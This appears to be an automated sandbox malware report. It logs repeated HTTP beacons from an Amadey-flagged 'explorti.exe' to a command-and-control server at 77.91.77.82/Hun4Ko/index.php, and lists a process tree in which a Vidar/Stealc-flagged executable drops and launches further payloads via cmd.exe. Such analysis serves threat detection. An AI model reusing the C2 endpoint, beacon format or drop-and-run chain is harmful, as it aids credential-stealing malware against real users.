                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:40:32.340603113 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:40:32 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                135192.168.2.64986577.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:40:32.465348959 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:40:33.186180115 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:40:33 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                136192.168.2.64986677.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:40:33.195080996 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:40:33.903908014 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:40:33 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                137192.168.2.64986777.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:40:34.023444891 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:40:34.752324104 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:40:34 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                138192.168.2.64986877.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:40:34.760967970 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:40:35.457936049 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:40:35 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                139192.168.2.64986977.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:40:35.583806992 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:40:36.305280924 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:40:36 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                140192.168.2.64987077.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:40:36.321340084 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:40:37.001458883 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:40:36 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                141192.168.2.64987177.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:40:37.264986038 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:40:37.966768026 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:40:37 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                142192.168.2.64987277.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:40:38.006036043 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:40:38.703145981 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:40:38 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                143192.168.2.64987377.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:40:38.829000950 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:40:39.533375978 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:40:39 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                144192.168.2.64987477.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:40:39.546828985 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:40:40.248943090 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:40:40 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                145192.168.2.64987577.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:40:40.373298883 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:40:41.215760946 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:40:40 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                146192.168.2.64987677.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:40:41.233365059 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:40:41.945683002 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:40:41 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                147192.168.2.64987777.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:40:42.071300030 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:40:42.767271996 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:40:42 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                148192.168.2.64987877.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:40:42.784265995 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:40:43.549927950 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:40:43 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                149192.168.2.64987977.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:40:43.663383961 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:40:44.363472939 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:40:44 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Click to jump to process

                                                                Click to jump to process

                                                                Click to dive into process behavior distribution

                                                                Click to jump to process

                                                                Target ID:0
                                                                Start time:02:38:07
                                                                Start date:03/07/2024
                                                                Path:C:\Users\user\Desktop\file.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\file.exe"
                                                                Imagebase:0xff0000
                                                                File size:2'523'648 bytes
                                                                MD5 hash:ACD738C0840861A12F13ACFF7C6FD7E5
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:Borland Delphi
                                                                Yara matches:
                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2271711490.0000000001096000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.2271711490.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000000.00000002.2271711490.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2271135677.00000000008AE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:4
                                                                Start time:02:38:25
                                                                Start date:03/07/2024
                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe"
                                                                Imagebase:0x1c0000
                                                                File size:236'544 bytes
                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:5
                                                                Start time:02:38:25
                                                                Start date:03/07/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff66e660000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:6
                                                                Start time:02:38:25
                                                                Start date:03/07/2024
                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\FHCAEGCBFH.exe"
                                                                Imagebase:0x1c0000
                                                                File size:236'544 bytes
                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:false

                                                                Target ID:7
                                                                Start time:02:38:25
                                                                Start date:03/07/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff66e660000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:false

                                                                Target ID:8
                                                                Start time:02:38:25
                                                                Start date:03/07/2024
                                                                Path:C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe"
                                                                Imagebase:0x7c0000
                                                                File size:1'925'632 bytes
                                                                MD5 hash:E5063918FA59220D9ED0825CD9DB008D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000008.00000003.2280009907.0000000004A10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000008.00000002.2322415423.00000000007C1000.00000040.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                Antivirus matches:
                                                                • Detection: 100%, Avira
                                                                • Detection: 100%, Joe Sandbox ML
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:10
                                                                Start time:02:38:30
                                                                Start date:03/07/2024
                                                                Path:C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe"
                                                                Imagebase:0xda0000
                                                                File size:1'925'632 bytes
                                                                MD5 hash:E5063918FA59220D9ED0825CD9DB008D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000A.00000002.4551252479.0000000000DA1000.00000040.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000A.00000003.2321726856.0000000004F20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                Antivirus matches:
                                                                • Detection: 100%, Avira
                                                                • Detection: 100%, Joe Sandbox ML
                                                                Reputation:low
                                                                Has exited:false

                                                                Target ID:11
                                                                Start time:02:38:30
                                                                Start date:03/07/2024
                                                                Path:C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                Imagebase:0xda0000
                                                                File size:1'925'632 bytes
                                                                MD5 hash:E5063918FA59220D9ED0825CD9DB008D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000B.00000002.2370682465.0000000000DA1000.00000040.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000B.00000003.2329883407.0000000004C70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:12
                                                                Start time:02:38:37
                                                                Start date:03/07/2024
                                                                Path:C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe"
                                                                Imagebase:0x900000
                                                                File size:2'523'648 bytes
                                                                MD5 hash:ACD738C0840861A12F13ACFF7C6FD7E5
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:Borland Delphi
                                                                Yara matches:
                                                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000C.00000002.2396795251.0000000001BE5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000002.2395229335.0000000000901000.00000040.00000001.01000000.0000000E.sdmp, Author: Joe Security
